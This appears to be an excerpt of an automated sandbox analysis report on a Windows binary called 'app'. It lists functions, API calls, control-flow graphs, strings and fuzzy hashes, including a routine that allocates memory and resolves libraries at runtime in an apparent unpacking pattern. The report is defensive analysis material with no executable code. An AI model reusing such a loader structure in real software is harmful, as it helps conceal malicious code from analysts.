                                                                                                                                              • GetProcAddress.KERNELBASE(?,-00000002), ref: 0042C8E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual$AddressLibraryLoadProc
                                                                                                                                              • String ID: 6$9+Di$Gs$M4U5$O$pfx8$s<O?(Su(
                                                                                                                                              • API String ID: 2938105391-2690861754
                                                                                                                                              • Opcode ID: 916608cc3e3ec2ceff47aa40f93238c1188128ce52c19099b677353d2d13b359
                                                                                                                                              • Instruction ID: d8249402ebe6bdfeba434c09cdb94f051b8725f3fd3e4fd9d669bd8fa7343339
                                                                                                                                              • Opcode Fuzzy Hash: 916608cc3e3ec2ceff47aa40f93238c1188128ce52c19099b677353d2d13b359
                                                                                                                                              • Instruction Fuzzy Hash: B3D16B71F012699FDB24CFA8D9807ADBBB1FF49700F6480AAD845EB341E7749941CB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025801BB Relevance: 14.9, APIs: 6, Strings: 2, Instructions: 879memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 025803CE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02580CBB
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                                • Part of subcall function 025D8E9F: GetProcessHeap.KERNEL32(?,Invalid,?,025D8DD0,?,?,?,?,02580204,?,000000FF,00000001,?,?), ref: 025D8EAD
                                                                                                                                                • Part of subcall function 025D8E9F: HeapAlloc.KERNEL32(00000000,00000000,?,?,Invalid,?,025D8DD0,?,?,?,?,02580204,?,000000FF,00000001,?), ref: 025D8EB7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02580F29
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02580F6F
                                                                                                                                              Strings
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 02581053
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 02581069
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$FreeValue$AllocArrayCryptDestroyProcessRandomSafe
                                                                                                                                              • String ID: called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 3513538077-3781368868
                                                                                                                                              • Opcode ID: afab51d457147d9503c0fd98708c68e03d0c694e95e03f62fd6aae5e2d80514a
                                                                                                                                              • Instruction ID: acd36a75ad88639b3c2ccdd3db76e2e9cc147338c5d2ad10ea6ebccb2077bd76
                                                                                                                                              • Opcode Fuzzy Hash: afab51d457147d9503c0fd98708c68e03d0c694e95e03f62fd6aae5e2d80514a
                                                                                                                                              • Instruction Fuzzy Hash: 41823971A093818FD324DF28C480B6AFBE1BFC9300F15895EE999A7351E7B0D949CB56
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0256EAC0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 177memorythreadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3431 256eac0-256eafc RtlAddVectoredExceptionHandler 3432 256eb02-256eb15 SetThreadStackGuarantee 3431->3432 3433 256ec9c-256ecd3 call 25ec9a0 3431->3433 3434 256eb26-256eb53 call 25bee40 call 25cd430 3432->3434 3435 256eb17-256eb20 GetLastError 3432->3435 3442 256ed1d-256ed2f 3433->3442 3451 256ecd5-256ece4 call 25ec900 3434->3451 3452 256eb59-256eb5f 3434->3452 3435->3434 3437 256ece6-256ed18 call 25ec9a0 3435->3437 3437->3442 3444 256ed31-256ed33 3442->3444 3445 256ed4b-256ed4f 3442->3445 3447 256ed46-256ed4a 3444->3447 3448 256ed35-256ed40 HeapFree 3444->3448 3449 256ed71-256ed75 3445->3449 3450 256ed51-256ed5b 3445->3450 3448->3447 3453 256ed6c-256ed70 3450->3453 3454 256ed5d-256ed66 HeapFree 3450->3454 3451->3442 3456 256eb60-256eb69 3452->3456 3454->3453 3458 256ec16-256ec9a call 25bf050 call 25bf1b0 3456->3458 3459 256eb6f-256eb73 3456->3459 3458->3433 3459->3456 3461 256eb75-256ebd3 call 2561310 call 25beec0 call 25bf2a0 call 256edff 3459->3461 3473 256ebd5-256ec00 call 25f0460 3461->3473 3474 256ec03-256ec15 3461->3474 3473->3474
                                                                                                                                              APIs
                                                                                                                                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,025BEC80), ref: 0256EAF4
                                                                                                                                              • SetThreadStackGuarantee.KERNELBASE(00005000), ref: 0256EB0D
                                                                                                                                              • GetLastError.KERNEL32 ref: 0256EB17
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0256ED40
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0256ED66
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,00000000), ref: 025BF223
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,?), ref: 025BF232
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorExceptionGuaranteeHandlerLastStackThreadVectored
                                                                                                                                              • String ID: Invalid$main
                                                                                                                                              • API String ID: 679289583-3302030394
                                                                                                                                              • Opcode ID: 97822b7fcaafc0a4f896eb4d43eeb8f0d09ae419207fdca03916c603226dbb11
                                                                                                                                              • Instruction ID: 1d940196d7923b0829f377ad2e291feccd8aba3296c9933f3666481e550b35ec
                                                                                                                                              • Opcode Fuzzy Hash: 97822b7fcaafc0a4f896eb4d43eeb8f0d09ae419207fdca03916c603226dbb11
                                                                                                                                              • Instruction Fuzzy Hash: 2C7156B0D002099BEF14DFA4D989BEEBFB6FF40308F140428E515AB280E7B55588CF99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D04D0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3496 25d04d0-25d04e1 3497 25d04e7 3496->3497 3498 25d05b2-25d05bc call 25f0970 3496->3498 3500 25d04e8-25d04f2 TlsGetValue 3497->3500 3498->3500 3501 25d04f4-25d04fb 3500->3501 3502 25d0501-25d0508 3500->3502 3501->3502 3504 25d05a7 3501->3504 3505 25d050e 3502->3505 3506 25d05c1-25d05cb call 25f0970 3502->3506 3507 25d05aa-25d05b1 3504->3507 3508 25d050f-25d0519 TlsGetValue 3505->3508 3506->3508 3510 25d051b-25d051f 3508->3510 3511 25d0584-25d0586 3508->3511 3513 25d0564-25d057c BCryptGenRandom 3510->3513 3514 25d0521-25d0536 call 25cd430 3510->3514 3511->3507 3516 25d057e-25d0582 3513->3516 3517 25d0588-25d0591 call 25cce20 3513->3517 3522 25d05dc-25d0627 call 25ec900 3514->3522 3523 25d053c-25d0559 3514->3523 3519 25d0596-25d05a3 3516->3519 3517->3519 3519->3504 3530 25d062c-25d0644 call 25f0970 3522->3530 3531 25d0629-25d062a 3522->3531 3524 25d055b 3523->3524 3525 25d05d0-25d05da call 25f0970 3523->3525 3527 25d055c-25d055e TlsSetValue 3524->3527 3525->3527 3527->3513 3533 25d0647-25d0663 TlsSetValue HeapFree 3530->3533 3531->3533 3536 25d0668-25d0675 call 25f0970 3533->3536 3537 25d0665-25d0666 3533->3537 3538 25d067a-25d0693 TlsSetValue 3536->3538 3537->3538
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                              • BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                                • Part of subcall function 025F0970: InitOnceBeginInitialize.KERNEL32(0262005C,00000000,00000000,00000000), ref: 025F0993
                                                                                                                                                • Part of subcall function 025F0970: TlsAlloc.KERNEL32 ref: 025F09A8
                                                                                                                                                • Part of subcall function 025F0970: InitOnceComplete.KERNEL32(0262005C,00000000,00000000), ref: 025F09D9
                                                                                                                                                • Part of subcall function 025CCE20: SystemFunction036.ADVAPI32(?,00000010), ref: 025CCE64
                                                                                                                                                • Part of subcall function 025F0970: TlsAlloc.KERNEL32 ref: 025F09E1
                                                                                                                                                • Part of subcall function 025F0970: InitOnceComplete.KERNEL32(0262005C,00000004,00000000), ref: 025F0A30
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000001), ref: 025D064A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025D0659
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000000), ref: 025D067D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$InitOnce$AllocComplete$BeginCryptFreeFunction036HeapInitializeRandomSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3346809877-0
                                                                                                                                              • Opcode ID: d241ee11fc5b5ce25e57cb8d8ee48297158e9a5059d31292bd20cec522c6b448
                                                                                                                                              • Instruction ID: 44d43da4a085e82d5960fe845d2ae37c883de1e52f1ed4cd300e000a1a9d4371
                                                                                                                                              • Opcode Fuzzy Hash: d241ee11fc5b5ce25e57cb8d8ee48297158e9a5059d31292bd20cec522c6b448
                                                                                                                                              • Instruction Fuzzy Hash: B241C571A006599FE7609F68C804BBEBBA9FF44714F044918ED45D72C0D770EC84CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00415DDE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3540 415dde-415e30 call 416ef8 call 415460 GetVersionExA 3545 415e32-415e38 3540->3545 3546 415e3e-415e58 GetModuleHandleA 3540->3546 3545->3546 3547 415e79-415e7c 3546->3547 3548 415e5a-415e65 3546->3548 3549 415ea5-415eaf call 418875 3547->3549 3548->3547 3550 415e67-415e70 3548->3550 3559 415eb1-415eb8 call 415dba 3549->3559 3560 415eb9-415ec0 call 419d60 3549->3560 3552 415e91-415e95 3550->3552 3553 415e72-415e77 3550->3553 3552->3547 3555 415e97-415e99 3552->3555 3553->3547 3554 415e7e-415e85 3553->3554 3554->3547 3557 415e87-415e8f 3554->3557 3558 415e9f-415ea2 3555->3558 3557->3558 3558->3549 3559->3560 3565 415ec2-415ec9 call 415dba 3560->3565 3566 415eca-415ed9 call 41b0ca call 41aecc 3560->3566 3565->3566 3573 415ee3-415eff GetCommandLineA call 41adaa call 41ad08 3566->3573 3574 415edb-415ee2 call 415d95 3566->3574 3581 415f01-415f08 call 415d95 3573->3581 3582 415f09-415f10 call 41aad5 3573->3582 3574->3573 3581->3582 3587 415f12-415f19 call 415d95 3582->3587 3588 415f1a-415f24 call 41726c 3582->3588 3587->3588 3593 415f26-415f2c call 415d95 3588->3593 3594 415f2d-415f46 GetStartupInfoA call 41aa6c 3588->3594 3593->3594 3599 415f48-415f4c 3594->3599 3600 415f4e-415f50 3594->3600 3601 415f51-415f5a GetModuleHandleA call 42da58 3599->3601 3600->3601 3603 415f5f-415f67 3601->3603 3604 415f69-415f6a call 4173a4 3603->3604 3605 415f6f-415faf call 4173c6 call 416f33 3603->3605 3604->3605
                                                                                                                                              APIs
                                                                                                                                              • GetVersionExA.KERNEL32(?,0043A478,00000060), ref: 00415DFE
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,0043A478,00000060), ref: 00415E51
                                                                                                                                              • GetCommandLineA.KERNEL32(?,0043A478,00000060), ref: 00415EE3
                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00415F34
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00415F57
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$CommandInfoLineStartupVersion
                                                                                                                                              • String ID: `&U
                                                                                                                                              • API String ID: 2778164164-1867068525
                                                                                                                                              • Opcode ID: 7580fc86ef3703e129c93f81ffe4cb78bab1cb0c9785aa81ad774adae03db122
                                                                                                                                              • Instruction ID: 4de3da79c62a0b75e44d7bd2c56d04160538a993b3b658ad46e0b3fd54b52aaf
                                                                                                                                              • Opcode Fuzzy Hash: 7580fc86ef3703e129c93f81ffe4cb78bab1cb0c9785aa81ad774adae03db122
                                                                                                                                              • Instruction Fuzzy Hash: 8D417D71D00B14CADB20AB76A8466EE37B1AF85714F24443FE5589A291DB3C89C2CB9D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D91D2 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 235memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3710 25d91d2-25d91db 3711 25d91dd-25d91e6 3710->3711 3712 25d9235-25d9237 3710->3712 3714 25d91e8-25d91f0 3711->3714 3715 25d91f5-25d9202 3711->3715 3713 25d9456-25d945f 3712->3713 3718 25d928d-25d928f 3714->3718 3716 25d923c-25d924b 3715->3716 3717 25d9204-25d9213 3715->3717 3716->3718 3719 25d924d-25d9255 3717->3719 3720 25d9215-25d9233 3717->3720 3721 25d9291-25d92ba 3718->3721 3723 25d925a-25d9262 3719->3723 3720->3712 3722 25d9257 3720->3722 3724 25d9460 call 25610d0 3721->3724 3725 25d92c0-25d92c9 3721->3725 3722->3723 3726 25d9288-25d928b 3723->3726 3727 25d9264-25d9286 3723->3727 3731 25d9465-25d946c call 25ec900 3724->3731 3725->3724 3728 25d92cf-25d92df call 25cd430 3725->3728 3726->3718 3727->3721 3728->3731 3735 25d92e5-25d9308 3728->3735 3734 25d9471-25d947d call 25d8b49 3731->3734 3743 25d947f-25d94a0 call 25ecda0 3734->3743 3736 25d9309-25d930c 3735->3736 3738 25d93ba 3736->3738 3739 25d9312-25d9314 3736->3739 3744 25d93bc-25d93c0 3738->3744 3741 25d931a-25d9322 3739->3741 3742 25d9405-25d940f 3739->3742 3745 25d932a-25d9337 3741->3745 3746 25d9324-25d9325 3741->3746 3747 25d9441 3742->3747 3748 25d9411-25d941b SysAllocStringLen 3742->3748 3750 25d93d2-25d9403 call 25f1847 3744->3750 3751 25d93c2-25d93cd 3744->3751 3754 25d9339-25d9348 3745->3754 3755 25d9377-25d937f 3745->3755 3746->3738 3756 25d9443-25d9445 3747->3756 3748->3734 3753 25d941d-25d9428 SysStringLen 3748->3753 3750->3751 3751->3736 3753->3756 3758 25d942a-25d943f call 25d8b49 SysFreeString 3753->3758 3759 25d934a-25d936c 3754->3759 3760 25d9381-25d9389 3754->3760 3755->3738 3756->3713 3761 25d9447-25d9450 HeapFree 3756->3761 3758->3743 3759->3742 3763 25d9372-25d9375 3759->3763 3764 25d938d-25d9393 3760->3764 3761->3713 3763->3764 3764->3738 3766 25d9395-25d93b8 3764->3766 3766->3744
                                                                                                                                              APIs
                                                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 025D9413
                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 025D9420
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 025D9439
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,02581C5A), ref: 025D9450
                                                                                                                                              Strings
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 025D9487
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$Free$AllocHeap
                                                                                                                                              • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                                                              • API String ID: 1317130057-2333694755
                                                                                                                                              • Opcode ID: 8ebc5e2f3cdc024c124c70e883f3b57dc24d5a551b9094c4bc98e45e1cb7744c
                                                                                                                                              • Instruction ID: 538e1765b37d891f2f553aadb64fa103fec5423cfdc0326530772e693b6d2a30
                                                                                                                                              • Opcode Fuzzy Hash: 8ebc5e2f3cdc024c124c70e883f3b57dc24d5a551b9094c4bc98e45e1cb7744c
                                                                                                                                              • Instruction Fuzzy Hash: E8712A73E046555BD3288E5DC89027ABBD2BBC4354F0A893DE89ECB381DA70DC05C799
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D04C0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                              • BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CryptRandom
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 658332386-0
                                                                                                                                              • Opcode ID: 3dc47e2773e6529d64e042b24fb5dda9b56c6546fd4cce04747590574309cbec
                                                                                                                                              • Instruction ID: 19ce33ab647d17b548b14a7187c942de8c705182e30376e72912b9ef476c06c6
                                                                                                                                              • Opcode Fuzzy Hash: 3dc47e2773e6529d64e042b24fb5dda9b56c6546fd4cce04747590574309cbec
                                                                                                                                              • Instruction Fuzzy Hash: 0121CD70A006448FE7309F2D9809B6A7BE8FF04709F058918ED48DB290E731EC94CBA8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CD430 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                              • RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                              • Opcode ID: db68e3975aa20c30635d5e3bb7248bf83c1601afedf64feabd2d0e1cc0c66555
                                                                                                                                              • Instruction ID: 9ac9bae91a537a76402f0eb1b9685ebffcc1c9ee1d65aba493d50f71c5cd4eec
                                                                                                                                              • Opcode Fuzzy Hash: db68e3975aa20c30635d5e3bb7248bf83c1601afedf64feabd2d0e1cc0c66555
                                                                                                                                              • Instruction Fuzzy Hash: CCD02B70B015015F47748EB9BC88C572EBCFBC52A23110839AA04C3100F7B0D490C3B8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D1862 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025D1B26
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CryptRandom
                                                                                                                                              • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 658332386-682668089
                                                                                                                                              • Opcode ID: 7398c3051851fca3b045e1980b1cecaecad982849c1408c16ad1732a4c7aeb51
                                                                                                                                              • Instruction ID: 15ca2c4429ebdbdd95a60fb601e37a2ae619c49779e9895b7edb5150d0d83e32
                                                                                                                                              • Opcode Fuzzy Hash: 7398c3051851fca3b045e1980b1cecaecad982849c1408c16ad1732a4c7aeb51
                                                                                                                                              • Instruction Fuzzy Hash: A1D14A71A087109FD358DF69C88035AF7E2FBC8310F1AC93EE99AD7250DA74E8419B81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042C5FF Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 311memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3136 42c5ff-42c600 3137 42c602-42c626 3136->3137 3138 42c62a-42c62e 3136->3138 3137->3138 3139 42c5c0-42c5fb 3138->3139 3140 42c630-42c638 3138->3140 3139->3136 3141 42c63c 3140->3141 3142 42c63e-42c648 3141->3142 3142->3142 3143 42c64a-42c64b 3142->3143 3143->3141 3144 42c64d-42c654 3143->3144 3145 42c683 3144->3145 3146 42c656-42c661 call 42c955 3144->3146 3147 42c686-42c6f5 call 42c9f5 * 3 VirtualAlloc 3145->3147 3152 42c663-42c672 call 42c973 3146->3152 3162 42c6f8-42c71e 3147->3162 3158 42c674-42c678 3152->3158 3159 42c67e-42c681 3152->3159 3158->3152 3160 42c67a-42c67c 3158->3160 3159->3147 3160->3147 3162->3162 3163 42c720-42c744 VirtualAlloc 3162->3163 3164 42c74a-42c76a 3163->3164 3165 42c94c 3163->3165 3167 42c783-42c7b7 3164->3167 3168 42c76c-42c772 3164->3168 3166 42c94e-42c954 3165->3166 3167->3165 3170 42c7bd-42c7c0 3167->3170 3169 42c774-42c77b 3168->3169 3169->3169 3172 42c77d-42c780 3169->3172 3171 42c7c2-42c7c7 3170->3171 3173 42c7d9-42c7dc 3171->3173 3174 42c7c9-42c7d1 3171->3174 3172->3167 3176 42c7ee-42c802 3173->3176 3177 42c7de-42c7e6 3173->3177 3174->3173 3175 42c7d3-42c7d6 3174->3175 3175->3173 3179 42c804-42c809 3176->3179 3180 42c81a-42c82a 3176->3180 3177->3176 3178 42c7e8-42c7eb 3177->3178 3178->3176 3181 42c80b-42c812 3179->3181 3180->3171 3182 42c82c-42c831 3180->3182 3181->3181 3183 42c814-42c817 3181->3183 3182->3165 3184 42c837-42c83c 3182->3184 3183->3180 3185 42c893-42c89b 3184->3185 3186 42c83e 3184->3186 3185->3165 3187 42c8a1-42c8aa 3185->3187 3188 42c841-42c859 3186->3188 3189 42c902-42c90d 3187->3189 3190 42c8ac-42c8b9 LoadLibraryA 3187->3190 3191 42c88b-42c88e 3188->3191 3192 42c85b 3188->3192 3194 42c938-42c94a call 25dd76d 3189->3194 3195 42c90f-42c920 3189->3195 3190->3165 3197 42c8bf-42c8ca 3190->3197 3191->3188 3196 42c890 3191->3196 3193 42c85d-42c86f 3192->3193 3198 42c871-42c883 3193->3198 3199 42c885-42c889 3193->3199 3194->3166 3195->3194 3200 42c922 3195->3200 3196->3185 3201 42c8f4-42c8fd 3197->3201 3202 42c8cc 3197->3202 3198->3199 3199->3191 3199->3193 3203 42c925-42c933 3200->3203 3201->3190 3206 42c8ff 3201->3206 3205 42c8cf-42c8d3 3202->3205 3211 42c935 3203->3211 3207 42c8d5-42c8d8 3205->3207 3208 42c8da-42c8dd 3205->3208 3206->3189 3210 42c8df-42c8ec GetProcAddress 3207->3210 3208->3210 3210->3205 3212 42c8ee-42c8f1 3210->3212 3211->3194 3212->3201
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000C4E00,00003000,00000004), ref: 0042C6C3
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
